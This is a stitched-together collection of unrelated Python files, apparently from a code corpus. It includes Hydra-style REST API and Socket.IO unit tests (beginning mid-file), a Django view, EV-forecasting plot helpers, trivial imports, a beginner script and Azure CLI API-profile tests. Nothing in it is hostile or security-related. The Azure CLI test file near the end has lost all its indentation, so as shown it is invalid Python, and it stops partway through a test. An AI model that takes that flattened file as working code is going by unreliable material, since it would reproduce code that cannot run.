                        '{}/add/{}'.format(endpoints[endpoint], ids),
                        data=json.dumps(data_))
                    assert put_response.status_code == 201

    def test_endpointClass_PUT(self):
        """Check non collection Class PUT."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "PUT" in class_methods:
                        dummy_object = gen_dummy_object(class_.title, self.doc)
                        put_response = self.client.put(
                            endpoints[endpoint], data=json.dumps(dummy_object))
                        assert put_response.status_code == 201

    def test_endpointClass_POST(self):
        """Check non collection Class POST."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "POST" in class_methods:
                        dummy_object = gen_dummy_object(class_.title, self.doc)
                        post_response = self.client.post(
                            endpoints[endpoint], data=json.dumps(dummy_object))
                        assert post_response.status_code == 200

    def test_endpointClass_DELETE(self):
        """Check non collection Class DELETE."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "DELETE" in class_methods:
                        delete_response = self.client.delete(
                            endpoints[endpoint])
                        assert delete_response.status_code == 200

    def test_endpointClass_GET(self):
        """Check non collection Class GET."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "GET" in class_methods:
                        response_get = self.client.get(endpoints[endpoint])
                        assert response_get.status_code == 200
                        response_get_data = json.loads(
                            response_get.data.decode('utf-8'))
                        assert "@context" in response_get_data
                        assert "@id" in response_get_data
                        assert "@type" in response_get_data

    def test_IriTemplate(self):
        """Test structure of IriTemplates attached to collections."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                response_get = self.client.get(endpoints[endpoint])
                assert response_get.status_code == 200
                response_get_data = json.loads(
                    response_get.data.decode('utf-8'))
                assert "search" in response_get_data
                assert "mapping" in response_get_data["search"]
                collection = self.doc.collections[collection_name]["collection"]
                class_ = self.doc.parsed_classes[collection.class_.title]["class"]
                class_props = [x.prop for x in class_.supportedProperty]
                for mapping in response_get_data["search"]["mapping"]:
                    if mapping["property"] not in ["limit", "offset", "pageIndex"]:
                        assert mapping["property"] in class_props

    def test_client_controlled_pagination(self):
        """Test pagination controlled by client with help of pageIndex,
        offset and limit parameters."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                response_get = self.client.get(endpoints[endpoint])
                assert response_get.status_code == 200
                response_get_data = json.loads(
                    response_get.data.decode('utf-8'))
                assert "search" in response_get_data
                assert "mapping" in response_get_data["search"]
                # Test with pageIndex and limit
                params = {"pageIndex": 1, "limit": 2}
                response_for_page_param = self.client.get(
                    endpoints[endpoint], query_string=params)
                assert response_for_page_param.status_code == 200
                response_for_page_param_data = json.loads(
                    response_for_page_param.data.decode('utf-8'))
                assert "first" in response_for_page_param_data["view"]
                assert "last" in response_for_page_param_data["view"]
                if "next" in response_for_page_param_data["view"]:
                    assert "pageIndex=2" in response_for_page_param_data["view"]["next"]
                    next_response = self.client.get(
                        response_for_page_param_data["view"]["next"])
                    assert next_response.status_code == 200
                    next_response_data = json.loads(
                        next_response.data.decode('utf-8'))
                    assert "previous" in next_response_data["view"]
                    assert "pageIndex=1" in next_response_data["view"]["previous"]
                # Test with offset and limit
                params = {"offset": 1, "limit": 2}
                response_for_offset_param = self.client.get(
                    endpoints[endpoint], query_string=params)
                assert response_for_offset_param.status_code == 200
                response_for_offset_param_data = json.loads(
                    response_for_offset_param.data.decode('utf-8'))
                assert "first" in response_for_offset_param_data["view"]
                assert "last" in response_for_offset_param_data["view"]
                if "next" in response_for_offset_param_data["view"]:
                    assert "offset=3" in response_for_offset_param_data["view"]["next"]
                    next_response = self.client.get(
                        response_for_offset_param_data["view"]["next"])
                    assert next_response.status_code == 200
                    next_response_data = json.loads(
                        next_response.data.decode('utf-8'))
                    assert "previous" in next_response_data["view"]
                    assert "offset=1" in next_response_data["view"]["previous"]

    def test_GET_for_nested_class(self):
        """Test GET on classes that expose nested objects."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "GET" in class_methods:
                        response_get = self.client.get(endpoints[endpoint])
                        assert response_get.status_code == 200
                        response_get_data = json.loads(
                            response_get.data.decode('utf-8'))
                        assert "@context" in response_get_data
                        assert "@id" in response_get_data
                        assert "@type" in response_get_data
                        class_props = [x for x in class_.supportedProperty]
                        for prop_name in class_props:
                            if isinstance(prop_name.prop, HydraLink) and prop_name.read is True:
                                nested_obj_resp = self.client.get(
                                    response_get_data[prop_name.title])
                                assert nested_obj_resp.status_code == 200
                                nested_obj = json.loads(
                                    nested_obj_resp.data.decode('utf-8'))
                                assert "@type" in nested_obj
                            elif "vocab:" in prop_name.prop:
                                assert "@type" in response_get_data[prop_name.title]

    def test_required_props(self):
        """Test that PUT of an object missing a required property fails."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "PUT" in class_methods:
                        dummy_object = gen_dummy_object(class_.title, self.doc)
                        required_prop = ""
                        for prop in class_.supportedProperty:
                            if prop.required:
                                required_prop = prop.title
                                break
                        if required_prop:
                            del dummy_object[required_prop]
                            put_response = self.client.put(
                                endpoints[endpoint], data=json.dumps(dummy_object))
                            assert put_response.status_code == 400

    def test_writeable_props(self):
        """Test that POSTing a property with writeable=False fails."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "POST" in class_methods:
                        dummy_object = gen_dummy_object(class_.title, self.doc)
                        # Test for writeable properties
                        post_response = self.client.post(
                            endpoints[endpoint], data=json.dumps(dummy_object))
                        assert post_response.status_code == 200
                        # Test for properties with writeable=False
                        non_writeable_prop = ""
                        for prop in class_.supportedProperty:
                            if prop.write is False:
                                non_writeable_prop = prop.title
                                break
                        if non_writeable_prop != "":
                            dummy_object[non_writeable_prop] = "xyz"
                            post_response = self.client.post(
                                endpoints[endpoint], data=json.dumps(dummy_object))
                            assert post_response.status_code == 405

    def test_readable_props(self):
        """Test that properties with readable=False are not returned by GET."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "GET" in class_methods:
                        not_readable_prop = ""
                        for prop in class_.supportedProperty:
                            if prop.read is False:
                                not_readable_prop = prop.title
                                break
                        if not_readable_prop:
                            get_response = self.client.get(
                                endpoints[endpoint])
                            get_response_data = json.loads(
                                get_response.data.decode('utf-8'))
                            assert not_readable_prop not in get_response_data

    def test_bad_objects(self):
        """Check that malformed objects are rejected."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                bad_response_put = self.client.put(
                    endpoints[endpoint],
                    data=json.dumps(dict(foo='bar')))
                assert bad_response_put.status_code == 400

    def test_bad_requests(self):
        """Check that unsupported methods on an object return 405."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                collection = self.doc.collections[collection_name]["collection"]
                class_ = self.doc.parsed_classes[collection.class_.title]["class"]
                class_methods = [x.method for x in class_.supportedOperation]
                dummy_object = gen_dummy_object(
                    collection.class_.title, self.doc)
                initial_put_response = self.client.put(
                    endpoints[endpoint], data=json.dumps(dummy_object))
                assert initial_put_response.status_code == 201
                response = json.loads(
                    initial_put_response.data.decode('utf-8'))
                regex = r'(.*)ID (.{36})* (.*)'
                matchObj = re.match(regex, response["description"])
                assert matchObj is not None
                id_ = matchObj.group(2)
                if "POST" not in class_methods:
                    dummy_object = gen_dummy_object(
                        collection.class_.title, self.doc)
                    post_replace_response = self.client.post(
                        '{}/{}'.format(endpoints[endpoint], id_),
                        data=json.dumps(dummy_object))
                    assert post_replace_response.status_code == 405
                if "DELETE" not in class_methods:
                    delete_response = self.client.delete(
                        '{}/{}'.format(endpoints[endpoint], id_))
                    assert delete_response.status_code == 405

    def test_Endpoints_Contexts(self):
        """Test all endpoints' contexts are generated properly."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                response_get = self.client.get(endpoints[endpoint])
                assert response_get.status_code == 200
                context = json.loads(
                    response_get.data.decode('utf-8'))["@context"]
                response_context = self.client.get(context)
                response_context_data = json.loads(
                    response_context.data.decode('utf-8'))
                assert response_context.status_code == 200
                assert "@context" in response_context_data


class SocketTestCase(unittest.TestCase):
    """Test Class for socket events and operations."""

    @classmethod
    def setUpClass(self):
        """Database setup before the tests."""
        print("Creating a temporary database...")
        engine = create_engine('sqlite:///:memory:')
        Base.metadata.create_all(engine)
        session = scoped_session(sessionmaker(bind=engine))
        self.session = session
        self.API_NAME = "demoapi"
        self.page_size = 1
        self.HYDRUS_SERVER_URL = "http://hydrus.com/"
        self.app = app_factory(self.API_NAME)
        self.socketio = create_socket(self.app, self.session)
        print("going for create doc")
        self.doc = doc_maker.create_doc(
            doc_writer_sample.api_doc.generate(),
            self.HYDRUS_SERVER_URL,
            self.API_NAME)
        test_classes = doc_parse.get_classes(self.doc.generate())
        test_properties = doc_parse.get_all_properties(test_classes)
        doc_parse.insert_classes(test_classes, self.session)
        doc_parse.insert_properties(test_properties, self.session)
        print("Classes and properties added successfully.")
        print("Setting up hydrus utilities... ")
        self.api_name_util = set_api_name(self.app, self.API_NAME)
        self.session_util = set_session(self.app, self.session)
        self.doc_util = set_doc(self.app, self.doc)
        self.page_size_util = set_page_size(self.app, self.page_size)
        self.client = self.app.test_client()
        self.socketio_client = self.socketio.test_client(
            self.app, namespace='/sync')
        print("Creating utilities context... ")
        self.api_name_util.__enter__()
        self.session_util.__enter__()
        self.doc_util.__enter__()
        self.client.__enter__()
        print("Setup done, running tests...")

    @classmethod
    def tearDownClass(self):
        """Tear down temporary database and exit utilities."""
        self.client.__exit__(None, None, None)
        self.doc_util.__exit__(None, None, None)
        self.session_util.__exit__(None, None, None)
        self.api_name_util.__exit__(None, None, None)
        self.session.close()

    def setUp(self):
        for class_ in self.doc.parsed_classes:
            class_title = self.doc.parsed_classes[class_]["class"].title
            dummy_obj = gen_dummy_object(class_title, self.doc)
            crud.insert(
                dummy_obj, id_=str(uuid.uuid4()), session=self.session)
            # If it's a collection class then add an extra object so
            # we can test pagination thoroughly.
            if class_ in self.doc.collections:
                crud.insert(
                    dummy_obj, id_=str(uuid.uuid4()), session=self.session)
        # Add two dummy modification records
        crud.insert_modification_record(method="POST",
                                        resource_url="", session=self.session)
        crud.insert_modification_record(method="DELETE",
                                        resource_url="", session=self.session)

    def test_connect(self):
        """Test connect event."""
        socket_client = self.socketio.test_client(self.app, namespace='/sync')
        data = socket_client.get_received('/sync')
        assert len(data) > 0
        event = data[0]
        assert event['name'] == 'connect'
        last_job_id = crud.get_last_modification_job_id(self.session)
        assert event['args'][0]['last_job_id'] == last_job_id
        socket_client.disconnect(namespace='/sync')

    def test_reconnect(self):
        """Test reconnect event."""
        socket_client = self.socketio.test_client(self.app, namespace='/sync')
        # Flush data of first connect event
        socket_client.get_received('/sync')
        # Client reconnects by emitting 'reconnect' event.
        socket_client.emit('reconnect', namespace='/sync')
        # Get update received on reconnecting to the server
        data = socket_client.get_received('/sync')
        assert len(data) > 0
        # Extract the event information
        event = data[0]
        assert event['name'] == 'connect'
        last_job_id = crud.get_last_modification_job_id(self.session)
        # Check last job id with last_job_id received by client in the update.
        assert event['args'][0]['last_job_id'] == last_job_id
        socket_client.disconnect(namespace='/sync')

    def test_modification_table_diff(self):
        """Test 'modification-table-diff' events."""
        # Flush old received data at socket client
        self.socketio_client.get_received('/sync')
        # Set last_job_id as the agent_job_id
        agent_job_id = crud.get_last_modification_job_id(self.session)
        # Add an extra modification record newer than the agent_job_id
        new_latest_job_id = crud.insert_modification_record(
            method="POST", resource_url="", session=self.session)
        self.socketio_client.emit('get_modification_table_diff',
                                  {'agent_job_id': agent_job_id},
                                  namespace='/sync')
        data = self.socketio_client.get_received('/sync')
        assert len(data) > 0
        event = data[0]
        assert event['name'] == 'modification_table_diff'
        # Check received event contains data of newly added modification record.
        assert event['args'][0][0]['method'] == "POST"
        assert event['args'][0][0]['resource_url'] == ""
        assert event['args'][0][0]['job_id'] == new_latest_job_id

    def test_socketio_POST_updates(self):
        """Test 'update' event emitted by socketio for POST operations."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "POST" in class_methods:
                        dummy_object = gen_dummy_object(class_.title, self.doc)
                        # Flush old socketio updates
                        self.socketio_client.get_received('/sync')
                        post_response = self.client.post(
                            endpoints[endpoint], data=json.dumps(dummy_object))
                        assert post_response.status_code == 200
                        # Get new socketio update
                        update = self.socketio_client.get_received('/sync')
                        assert len(update) != 0
                        assert update[0]['args'][0]['method'] == "POST"
                        resource_name = update[0]['args'][0][
                            'resource_url'].split('/')[-1]
                        assert resource_name == endpoints[endpoint].split('/')[-1]

    def test_socketio_DELETE_updates(self):
        """Test 'update' event emitted by socketio for DELETE operations."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            if endpoint not in ["@context", "@id", "@type"]:
                class_name = "/".join(endpoints[endpoint].split(
                    "/{}/".format(self.API_NAME))[1:])
                if class_name not in self.doc.collections:
                    class_ = self.doc.parsed_classes[class_name]["class"]
                    class_methods = [
                        x.method for x in class_.supportedOperation]
                    if "DELETE" in class_methods:
                        # Flush old socketio updates
                        self.socketio_client.get_received('/sync')
                        delete_response = self.client.delete(
                            endpoints[endpoint])
                        assert delete_response.status_code == 200
                        # Get new update event
                        update = self.socketio_client.get_received('/sync')
                        assert len(update) != 0
                        assert update[0]['args'][0]['method'] == 'DELETE'
                        resource_name = update[0]['args'][0][
                            'resource_url'].split('/')[-1]
                        assert resource_name == endpoints[endpoint].split('/')[-1]


if __name__ == '__main__':
    message = """
    Running tests for the app. Checking if all responses are in proper order.
    """
    unittest.main()
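The ID-extraction pattern `r'(.*)ID (.{36})* (.*)'` recurs in every test above that needs the UUID of a freshly PUT object. A small standalone sketch of how that match behaves — the description string below is made up to mirror the shape of the API's responses, not taken from a real one:

```python
import re

# Same pattern the tests use: the 36-character group captures a UUID4
# (8-4-4-4-12 hex digits plus hyphens is exactly 36 characters).
regex = r'(.*)ID (.{36})* (.*)'

# Hypothetical response description, shaped like the ones the API returns.
description = "Object with ID 9a3b1c2d-4e5f-6789-abcd-ef0123456789 successfully added"
match_obj = re.match(regex, description)
assert match_obj is not None
print(match_obj.group(2))  # 9a3b1c2d-4e5f-6789-abcd-ef0123456789
```

Group 2 holds the UUID because the greedy `(.*)` backtracks to the last `"ID "`, and the repeated 36-character group can only fit one repetition before the trailing space.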
# ---- uvcgan/data/__init__.py (repo: LS4GAN/uvcgan, license: BSD-2-Clause) ----
from .data import get_data, load_datasets
# ---- study/views/articles.py (repo: mekroket/Anchor, license: MIT) ----
from django.shortcuts import render


def Makaleler(request):
    return render(request, "pages/articles.html")
# ---- buildin_modules/pkg_practice/sample_import_pkg.py (repo: Mason-Lin/python_playground, license: MIT) ----
from sample_pkg.sample_module import sample_func
# from sample_pkg import sample_module

if __name__ == '__main__':
    sample_func()
    # sample_module.sample_func()
# ---- modelling/F1_plot_functions.py (repo: ClimateSubak/EV-forecasting, license: MIT) ----
import pandas as pd
import geopandas as gpd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
def plot_single_msoa(y_train, y_test, y_pred, msoa):
    # Map y_pred array to a dataframe with consistent indices to test set
    df_pred = pd.DataFrame(index=y_test.index)
    df_pred['ev_count'] = y_pred
    df_pred.head()
    fig, ax = plt.subplots(figsize=(10, 5))
    ax.plot(y_train.loc[msoa, :], color='k', label='Train')
    ax.plot(y_test.loc[msoa, :], color='b', label='Test')
    ax.plot(df_pred.loc[msoa, :], color='b', linestyle=':', label='Predicted')
    ax.set_xlabel('Date')
    ax.set_ylabel('EV Count')
    plt.xticks([min(y_train.loc[msoa, :].index),
                max(y_train.loc[msoa, :].index),
                max(y_test.loc[msoa, :].index)],
               rotation=45)
    plt.axvline(x=max(y_train.loc[msoa, :].index), color='k', linestyle='--')
    plt.legend()
    return ax


def plot_dated_evdist(y_test, y_pred, msoas, date):
    idx = pd.IndexSlice
    # Map y_pred array to a dataframe with consistent indices to test set
    df_pred = pd.DataFrame(index=y_test.index)
    df_pred['ev_count'] = y_pred
    ax = sns.distplot(df_pred.loc[idx[msoas, date, :]]['ev_count'],
                      hist_kws={'rwidth': 0.85,
                                'edgecolor': 'black',
                                'alpha': 0.2},
                      label='Predicted')
    ax = sns.distplot(y_test.loc[idx[msoas, :]]['ev_count'],
                      hist_kws={'rwidth': 0.85,
                                'edgecolor': 'black',
                                'alpha': 0.2},
                      label='Test')
    ax.set_title('Nonzero EV Distribution')
    plt.legend()
    return ax


def plot_steady_evdist(y_test, y_pred, msoas):
    df_pred = pd.DataFrame(index=y_test.index)
    df_pred['ev_count'] = y_pred
    ax = sns.distplot(df_pred.loc[msoas]['ev_count'],
                      hist_kws={'rwidth': 0.85,
                                'edgecolor': 'black',
                                'alpha': 0.2},
                      label='Predicted')
    ax = sns.distplot(y_test.loc[msoas]['ev_count'],
                      hist_kws={'rwidth': 0.85,
                                'edgecolor': 'black',
                                'alpha': 0.2},
                      label='Test')
    ax.set_title('Nonzero EV Distribution')
    plt.legend()
    return ax


def plot_single_msoa_train_val_test(y_train, y_val, y_test,
                                    y_pred_test, y_pred_val, msoa):
    # Map y_pred array to a dataframe with consistent indices to test set
    df_pred_test = pd.DataFrame(index=y_test.index)
    df_pred_test['ev_count'] = y_pred_test
    df_pred_test.head()
    # Map y_pred array to a dataframe with consistent indices to validation set
    df_pred_val = pd.DataFrame(index=y_val.index)
    df_pred_val['ev_count'] = y_pred_val
    df_pred_val.head()
    fig, ax = plt.subplots(figsize=(10, 5))
    ax.plot(y_train.loc[msoa, :], color='k', label='Train')
    ax.plot(y_val.loc[msoa, :], color='k', linestyle='-', label='Validation')
    ax.plot(df_pred_val.loc[msoa, :], color='b', linestyle=':',
            label='Predicted (val)')
    ax.plot(y_test.loc[msoa, :], color='b', label='Test')
    ax.plot(df_pred_test.loc[msoa, :], color='b', linestyle=':',
            label='Predicted (test)')
    ax.set_xlabel('Date')
    ax.set_ylabel('EV Count')
    plt.xticks([min(y_train.loc[msoa, :].index),
                max(y_train.loc[msoa, :].index),
                max(y_val.loc[msoa, :].index),
                max(y_test.loc[msoa, :].index)],
               rotation=45)
    plt.axvline(x=max(y_train.loc[msoa, :].index), color='k', linestyle='--')
    plt.axvline(x=max(y_val.loc[msoa, :].index), color='k', linestyle='--')
    plt.legend()
    return ax
# ---- Basics/largest-in-an-array.py (repo: abhishek8075374519/python-for-beginners, license: MIT) ----
a = [5, 6, 8, 2, 3]
print(max(a))
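The built-in `max()` used above scans the list in a single pass; with a `key` function the same built-in picks the largest element by any derived value, so no explicit loop is needed:

```python
nums = [5, 6, 8, 2, 3]
print(max(nums))            # 8

# key= lets max() compare by a derived value, e.g. string length.
words = ["ev", "forecast", "msoa"]
print(max(words, key=len))  # forecast
```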
# ---- plpred/models/__init__.py (repo: mandimunari/-plpred, license: MIT) ----
from .plpred_rf import PlpredRF
from .plpred_gb import PlpredGB
from .plpred_nn import PlpredNN
from .plpred_svm import PlpredSVM
from .base_model import BaseModel
# ---- src/azure-cli-core/azure/cli/core/tests/test_api_profiles.py (repo: v-Ajnava/azure-cli, license: MIT) ----
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
import mock
from azure.cli.core.profiles import (get_api_version,
supported_api_version,
PROFILE_TYPE,
ResourceType)
from azure.cli.core.profiles._shared import APIVersionException
from azure.cli.core.cloud import Cloud
class TestAPIProfiles(unittest.TestCase):
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_get_api_version(self):
# Can get correct resource type API version
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertEqual(get_api_version(ResourceType.MGMT_STORAGE), '2020-10-10')
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_get_api_version_invalid_rt(self):
# Resource Type not in profile
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
with self.assertRaises(APIVersionException):
get_api_version(ResourceType.MGMT_COMPUTE)
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='not-a-real-profile'))
def test_get_api_version_invalid_active_profile(self):
# The active profile is not in our profile dict
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
with self.assertRaises(APIVersionException):
get_api_version(ResourceType.MGMT_STORAGE)
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='not-a-real-profile'))
def test_supported_api_version_invalid_profile_name(self):
# Invalid name for the profile name
with self.assertRaises(ValueError):
supported_api_version(PROFILE_TYPE, min_api='2000-01-01')
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_get_api_version_invalid_rt_2(self):
# None is not a valid resource type
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
with self.assertRaises(APIVersionException):
get_api_version(None)
def test_supported_api_profile_no_constraints(self):
# At least a min or max version must be specified
with self.assertRaises(ValueError):
supported_api_version(PROFILE_TYPE)
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile'))
def test_supported_api_profile_min_constraint(self):
self.assertTrue(supported_api_version(PROFILE_TYPE, min_api='2000-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile-preview'))
def test_supported_api_profile_min_constraint_not_supported(self):
self.assertFalse(supported_api_version(PROFILE_TYPE, min_api='2000-01-02'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile'))
def test_supported_api_profile_min_max_constraint(self):
self.assertTrue(supported_api_version(PROFILE_TYPE,
min_api='2000-01-01',
max_api='2000-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile'))
def test_supported_api_profile_max_constraint_not_supported(self):
self.assertFalse(supported_api_version(PROFILE_TYPE, max_api='1999-12-30'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile'))
def test_supported_api_profile_preview_constraint(self):
self.assertTrue(supported_api_version(PROFILE_TYPE, min_api='2000-01-01-preview'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile-preview'))
def test_supported_api_profile_preview_constraint_in_profile(self):
self.assertFalse(supported_api_version(PROFILE_TYPE, min_api='2000-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='latest'))
def test_supported_api_profile_latest(self):
self.assertTrue(supported_api_version(PROFILE_TYPE, min_api='2000-01-01'))
def test_supported_api_version_no_constraints(self):
# At least a min or max version must be specified
with self.assertRaises(ValueError):
supported_api_version(ResourceType.MGMT_STORAGE)
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_min_constraint(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertTrue(supported_api_version(ResourceType.MGMT_STORAGE, min_api='2000-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_max_constraint(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertTrue(supported_api_version(ResourceType.MGMT_STORAGE, max_api='2021-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_min_max_constraint(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertTrue(supported_api_version(ResourceType.MGMT_STORAGE,
min_api='2020-01-01',
max_api='2021-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_max_constraint_not_supported(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertFalse(supported_api_version(ResourceType.MGMT_STORAGE, max_api='2019-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_min_constraint_not_supported(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertFalse(supported_api_version(ResourceType.MGMT_STORAGE, min_api='2021-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_preview_constraint(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10-preview'}}
